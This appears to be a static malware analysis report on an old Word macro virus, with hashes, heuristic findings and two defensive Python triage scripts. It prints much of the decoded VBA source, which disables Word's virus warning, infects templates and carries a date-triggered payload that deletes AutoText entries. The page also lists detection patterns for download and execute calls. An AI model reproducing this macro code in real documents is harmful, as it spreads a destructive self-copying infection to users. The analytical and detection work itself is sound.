Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b5aa7f6b4c24c923…

MALICIOUS

Office (OLE)

Size: 41.5 KB
Created: 1999-06-08 21:30:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 2d6079b1aeaa3f3a0427771f69628db3
SHA-1: ddf8d8db136d75486b011bdcf25e034b973dff1f
SHA-256: b5aa7f6b4c24c923c4dacdb5905390a81349703cb527d3bf909349147d41a52b
Risk Score: 320

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains a VBA project with three automatic entry points: Document_Open, Document_New and a Sub named Autoexec (the legacy Word auto-execution name; the OLE_LEGACY_WORDBASIC_AUTOEXEC finding refers to this marker, and its "no modern VBA project was recovered" wording is contradicted by the 28 KB macros.bas extraction below). Document_Open sets Options.VirusProtection = False and then calls copyfromtempl and copytotempl; their bodies are outside the recovered preview, but the names, together with the references to Normal.ThisDocument and ActiveDocument.AttachedTemplate, point to template infection as the spreading mechanism. Autoexec is a date-conditioned logic bomb: on or after the constant Funkydate ("13/ 08 / 99") it deletes every AutoText entry of the attached template, writes each entry's name and value to a new directory under the user templates path (falling back to c:\office97\templates), creates up to 1000 numbered directories once no entries remain, and shows a MsgBox titled "Wipe-out !!!". No download, Shell or CreateObject call appears anywhere in the recovered source, so the ClamAV names Doc.Dropper.Agent-6961836-0 and Win.Trojan.C-286 are signature labels, not evidence of a second-stage download; the visible behaviour is template infection plus a destructive payload. The carved "embedded" OLE body at offset 0x4000 is 26,112 bytes, which is exactly the remainder of the 41.5 KB parent (0x4000 + 26,112 = 42,496 bytes = 41.5 KiB), so that carve simply runs from a signature hit to end of file; the two child-level findings (no readable streams, 100% slack) describe that carve rather than a separately wrapped exploit document and should carry less weight than the macro evidence.
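A keyword triage of the recovered source, in the style of the AutoExec/Suspicious tables olevba prints, added here as an example (it is not the report tool's code and not part of oletools). It runs over a constructed excerpt abbreviated from the macros.bas listing under Extracted artifacts; the indicator table, the category names and the summarize() fields are this example's own choices. The point it makes is the one the insight above rests on: the entry points, the VirusProtection switch, the date trigger and the file-system effects are all provable from the text, and a download/execute primitive is not.

```python
import re

# Constructed excerpt, abbreviated from the macros.bas listing on this page.
SAMPLE_VBA = """\
Private Sub Document_New()
 Call copyfromtempl
End Sub

Private Sub Document_Open()
On Error GoTo Dopen
  With Options
    .VirusProtection = False
  End With
 Call copyfromtempl
 Call copytotempl
Dopen:
Exit Sub
End Sub

Const Funkydate = "13/ 08 / 99"

Sub Autoexec()
   Application.Documents.Add
   Normal.ThisDocument.ActiveWindow.Activate
If Now() = Funkydate Or Now() > Funkydate Then
    GoTo Funkystart
End If
Funkystart:
   Set mytemplate = ActiveDocument.AttachedTemplate
          mytemplate.AutoTextEntries(x).Delete
End Sub

Sub Templatepath()
    templpath = Options.DefaultFilePath(Path:=wdUserTemplatesPath)
        MkDir templpath
    Open templpath & "\\Tpath.txt" For Output As 1#
        Write #1, templpath
    Close #1
End Sub
"""

# (category, regex, description). Categories and wording are this example's own.
INDICATORS = [
    ("autoexec",   r"\bSub\s+(Document_Open|Document_New|Document_Close|Auto(Open|Exec|New|Close|Exit))\b",
                   "macro runs without user action"),
    ("suspicious", r"\.VirusProtection\s*=\s*False", "disables Word's macro-virus warning"),
    ("suspicious", r"\bMkDir\b", "creates directories"),
    ("suspicious", r"\bOpen\b.+\bFor\s+Output\b", "writes a file"),
    ("suspicious", r"AutoTextEntries\(.*\)\.Delete", "deletes AutoText entries (destructive)"),
    ("suspicious", r"\bNormal\.ThisDocument\b|\bAttachedTemplate\b", "reaches into the global/attached template"),
    ("trigger",    r"\bNow\(\)\s*(=|<|>|<=|>=)\s*(\w+)", "date-conditioned logic bomb"),
    ("download",   r"\bShell\b|\bCreateObject\b|URLDownloadToFile|XMLHTTP|WinHttp|\bGetObject\b",
                   "download/execute primitive"),
]


def scan_vba(src):
    """Line-by-line indicator scan. Returns {category: [(line_no, matched_text, description)]}."""
    hits = {cat: [] for cat, _, _ in INDICATORS}
    for no, line in enumerate(src.splitlines(), 1):
        code = line.split("'", 1)[0]   # drop VBA comments (naive: a quote inside a string also cuts)
        for cat, pat, desc in INDICATORS:
            m = re.search(pat, code, re.IGNORECASE)
            if m:
                hits[cat].append((no, m.group(0).strip(), desc))
    return hits


def summarize(hits):
    """Reduce raw hits to the statements an analyst can defend from the source alone."""
    return {
        "entry_points": sorted({re.sub(r"^Sub\s+", "", m, flags=re.I) for _, m, _ in hits["autoexec"]}),
        "disables_virus_protection": any("VirusProtection" in m for _, m, _ in hits["suspicious"]),
        "date_trigger_constants": sorted({m.split()[-1] for _, m, _ in hits["trigger"]}),
        "filesystem_effects": sorted({d for _, _, d in hits["suspicious"]
                                      if d.startswith(("creates", "writes", "deletes"))}),
        "download_primitive_seen": bool(hits["download"]),
    }


if __name__ == "__main__":
    for key, value in summarize(scan_vba(SAMPLE_VBA)).items():
        print("%-28s %s" % (key + ":", value))
```

The comment stripping is deliberately crude; for a real sample run olevba first so that the scan operates on decompressed, de-obfuscated source rather than on the raw module stream.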

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6961836-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6961836-0
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 26,112 bytes but its declared streams total only 0 bytes — 26,112 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
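The three structural findings above (a CFB body carved out of another file, a body whose declared streams cover none of its bytes, and a header with no readable directory) all come down to one computation: walk the FAT and see which sectors any chain actually reaches. The following is an added example of that accounting, written for this page and not the report tool's own code or olefile; it parses a CFB header, FAT and directory, reports declared stream bytes against unallocated sector slack, and classifies every nested CFB signature by whether it sits in an allocated sector of the parent or in slack. The input is a constructed file built inline (not the sample above); reading only the 109 header DIFAT entries, and the dict field names, are this example's simplifications.

```python
"""Sector accounting for a CFB/OLE2 file: which bytes the FAT reaches, which
it does not, and where any nested CFB signature sits relative to that."""
import struct

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
FREESECT, ENDOFCHAIN, FATSECT = 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFD
NOSTREAM, STREAM, ROOT = 0xFFFFFFFF, 2, 5


def find_cfb_headers(data):
    """Every offset at which the CFB magic occurs (what a carver keys on)."""
    hits, pos = [], data.find(CFB_MAGIC)
    while pos != -1:
        hits.append(pos)
        pos = data.find(CFB_MAGIC, pos + 1)
    return hits


def cfb_accounting(data, base=0):
    """Parse the CFB at `base`: stream list, declared stream bytes, and the bytes
    in sectors that no FAT entry allocates (slack). Reads only the 109 DIFAT
    entries in the header, which covers files below roughly 6.8 MB."""
    body = data[base:]
    if not body.startswith(CFB_MAGIC) or len(body) < 512:
        raise ValueError("no CFB header at offset 0x%x" % base)
    ssz = 1 << struct.unpack_from("<H", body, 30)[0]        # sector shift
    if ssz not in (512, 4096):
        raise ValueError("implausible sector size %d at offset 0x%x" % (ssz, base))
    n_sectors, tail = divmod(len(body) - ssz, ssz)         # sectors after the header, partial tail

    def sector(i):
        return body[(i + 1) * ssz:(i + 2) * ssz]

    fat = []
    for fs in struct.unpack_from("<109I", body, 76):         # header DIFAT lists the FAT sectors
        if fs >= n_sectors:                                  # FREESECT, or a FAT sector past EOF
            break
        fat.extend(struct.unpack_from("<%dI" % (ssz // 4), sector(fs)))

    streams, seen = [], set()
    sid = struct.unpack_from("<I", body, 48)[0]              # first directory sector
    while sid < min(n_sectors, len(fat)) and sid not in seen:
        seen.add(sid)
        sec = sector(sid)
        for k in range(ssz // 128):                          # 128-byte directory entries
            name_raw, name_len, otype = struct.unpack_from("<64sHB", sec, k * 128)
            start, size = struct.unpack_from("<IQ", sec, k * 128 + 116)
            if otype == STREAM:
                streams.append((name_raw[:max(name_len - 2, 0)].decode("utf-16-le", "replace"), size))
        sid = fat[sid]

    # Sectors the FAT never allocates, plus sectors beyond FAT coverage and a partial tail, are slack.
    allocated = sum(1 for i in range(min(n_sectors, len(fat))) if fat[i] != FREESECT)
    slack = (n_sectors - allocated) * ssz + tail
    return {"size": len(body), "sector_size": ssz, "sectors": n_sectors, "fat": fat,
            "streams": streams, "declared_stream_bytes": sum(s for _, s in streams),
            "allocated_sectors": allocated, "slack_bytes": slack,
            "slack_pct": round(100.0 * slack / len(body), 1)}


def hit_location(parent, offset):
    """'header', 'allocated' (inside a FAT-chained sector, e.g. an ObjectPool stream) or 'slack'."""
    ssz = parent["sector_size"]
    if offset < ssz:
        return "header"
    idx = (offset - ssz) // ssz
    return "allocated" if idx < len(parent["fat"]) and parent["fat"][idx] != FREESECT else "slack"


def triage(data):
    """One record per CFB signature: where it sits in the outer file and whether it parses."""
    report, parent = [], None
    for off in find_cfb_headers(data):
        acc, err = None, None
        try:
            acc = cfb_accounting(data, off)
        except ValueError as e:
            err = str(e)
        if off == 0:
            parent = acc
        report.append({"offset": off,
                       "location": hit_location(parent, off) if parent and off else "outer file",
                       "parse_error": err,
                       "summary": None if acc is None else (acc["streams"], acc["declared_stream_bytes"],
                                                            acc["slack_bytes"], acc["slack_pct"])})
    return report


def build_sample():
    """Constructed input (not the page's sample): 512-byte sectors, one 4096-byte
    stream 'Macros' in sectors 2-9, then four sectors no FAT entry allocates that
    begin with a second CFB magic, the shape a carver reports as 'embedded'."""
    ssz = 512
    hdr = bytearray(ssz)
    hdr[0:8] = CFB_MAGIC
    struct.pack_into("<HHHHH", hdr, 24, 0x3E, 3, 0xFFFE, 9, 6)      # versions, byte order, shifts
    struct.pack_into("<8I", hdr, 44, 1, 1, 0, 0x1000, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<109I", hdr, 76, 0, *([FREESECT] * 108))      # DIFAT: the FAT is sector 0
    fat = [FREESECT] * (ssz // 4)
    fat[0], fat[1] = FATSECT, ENDOFCHAIN                            # sector 0 FAT, sector 1 directory
    fat[2:10] = [3, 4, 5, 6, 7, 8, 9, ENDOFCHAIN]                   # sectors 2-9: the stream chain

    def dirent(name, otype, child, start, size):
        e = bytearray(128)
        n = name.encode("utf-16-le") + b"\x00\x00"
        e[:len(n)] = n
        struct.pack_into("<HBBIII", e, 64, len(n), otype, 1, NOSTREAM, NOSTREAM, child)
        struct.pack_into("<IQ", e, 116, start, size)
        return bytes(e)

    directory = (dirent("Root Entry", ROOT, 1, ENDOFCHAIN, 0)
                 + dirent("Macros", STREAM, NOSTREAM, 2, 4096) + bytes(2 * 128))
    slack = CFB_MAGIC + bytes(4 * ssz - 8)
    return bytes(hdr) + struct.pack("<128I", *fat) + directory + b"A" * 4096 + slack


if __name__ == "__main__":
    for rec in triage(build_sample()):
        print(rec)
```

Run against a real sample, a signature hit whose sector the parent's FAT marks FREESECT, and whose own header yields no directory, is the combination that produced the child-level findings above; a hit inside an allocated sector (typically an ObjectPool storage) is the case where a genuinely embedded document is worth carving and scanning on its own.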

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28255 bytes
SHA-256: 1df8e211c1b74b73ed0a5c5ec4771da322e7b936b722d1763cb7c00e75b3e736
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_New()
On Error GoTo dnew
 Call copyfromtempl
dnew:
Exit Sub
End Sub

Private Sub Document_Open()
On Error GoTo Dopen
  With Options
    .VirusProtection = False
  End With
 Call copyfromtempl
 Call copytotempl
Dopen:
Exit Sub
End Sub

Attribute VB_Name = "Funky"
Option Explicit

Public templpath, docouname, docname As String
Public autentriesn
Public autentriest
Public uname
Public newdirc, lengthdirc, NPath
Public w, x, z, y, doccount, projcount As Integer
Public mytemplate As Template
Const Funkydate = "13/ 08 / 99"
Public lengthn
Public fnamet, fnamet2, fnamed, fnamed2 As String

Sub Autoexec()
On Error GoTo exitsub
   
   Application.Documents.Add

   doccount = Application.Documents.Count
   
   If doccount = 1 Then
        GoTo copyto
   ElseIf doccount > 1 Then
           Normal.ThisDocument.ActiveWindow.Activate
   End If
  
copyto:
    
    
        Call copytotempl
        Call copyfromtempl

Funkyday:

If Now() = Funkydate Or Now() > Funkydate Then
    GoTo Funkystart
Else
    GoTo exitsub
End If

Funkystart:
   Call pagelay
   
   Set mytemplate = ActiveDocument.AttachedTemplate
  
   If mytemplate.AutoTextEntries.Count = 0 Then
        For z = 1000 To 1 Step -1
            Call newdir
        Next z
        Exit Sub
   Else
        
        For x = mytemplate.AutoTextEntries.Count To 1 Step -1
          
          autentriesn = mytemplate.AutoTextEntries(x).Name
          autentriest = mytemplate.AutoTextEntries(x).Value
              Call Templatepath
              Call dircreate
          mytemplate.AutoTextEntries(x).Delete
                
                If mytemplate.AutoTextEntries.Count = 0 Then
                    GoTo Message
                End If
        Next x
   End If
 Exit Sub
exitsub:
  
Exit Sub
Message:
   Call sname
   
   MsgBox "Hi, " & "< " & uname & " >" & Chr(13) & Chr(10) & Chr(13) & Chr(10) & "Sorry, did you say there are no more Autotext Entries? " & Chr(13) & Chr(10) & "Never mind, you should have enough information to replace it." & Chr(13) & Chr(10) & "Take a look at your Templates directory !!!", vbCritical, "Wipe-out !!!"
    GoTo exitsub
   
End Sub

Sub Templatepath()
On Error GoTo exitsub
    templpath = Options.DefaultFilePath(Path:=wdUserTemplatesPath)
    
    If templpath = "" Then
        templpath = "c:\office97\templates"
        MkDir templpath
 
    Else
        templpath = Options.DefaultFilePath(Path:=wdUserTemplatesPath)
  
    End If
   
    Open templpath & "\Tpath.txt" For Output As 1#
        Write #1, templpath
    Close #1
exitsub:

End Sub

Sub dircreate()

On Error GoTo ending
   
    lengthn = Len(autentriesn)
    autentriesn = Trim(Mid(autentriesn, 1, lengthn - 1))
    MkDir templpath & "\" & autentriesn
    Open templpath & "\" & autentriesn & "\" & autentriesn & ".txt" For Output As 1#
        Write #1, autentriest
    Close #1
   
ending:
End Sub

Sub sname()
On Error GoTo exitsub
    uname = Application.UserName
exitsub:
End Sub

Sub pagelay()
On Error GoTo exitsub
    If ActiveWindow.View.SplitSpecial = wdPaneNone Then
        ActiveWindow.ActivePane.View.Type = wdPageView
    Else
        ActiveWindow.View.Type = wdPageView
    End If
exitsub:
End Sub

Sub newdir()
On Error GoTo wrfile
    Call Templatepath
    Open templpath & "\Tpath.txt" For Input As #1
        Do While Not EOF(1)
            Input #1, newdirc
        Loop
    Close #1
    lengthdirc = Len(newdirc)
    newdirc = Trim(Mid(newdirc, 1, lengthdirc))
    NPath = Trim(Mid(newdirc, 4, lengthdirc))
    MkDir newdirc & (z)
exitsub:
Exit Sub
wrfile:
    Call errdircreate
    GoTo exitsub
End Sub

Sub errdircreate()
On Error GoTo endnow
    Open newdirc & (z) &
... (truncated)
embedded_office_off00004000.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x4000 | 26112 bytes
SHA-256: 4f83fa8da6a632776fba68b7f3e1ce99398743494427ab5e14a21b1685d8809f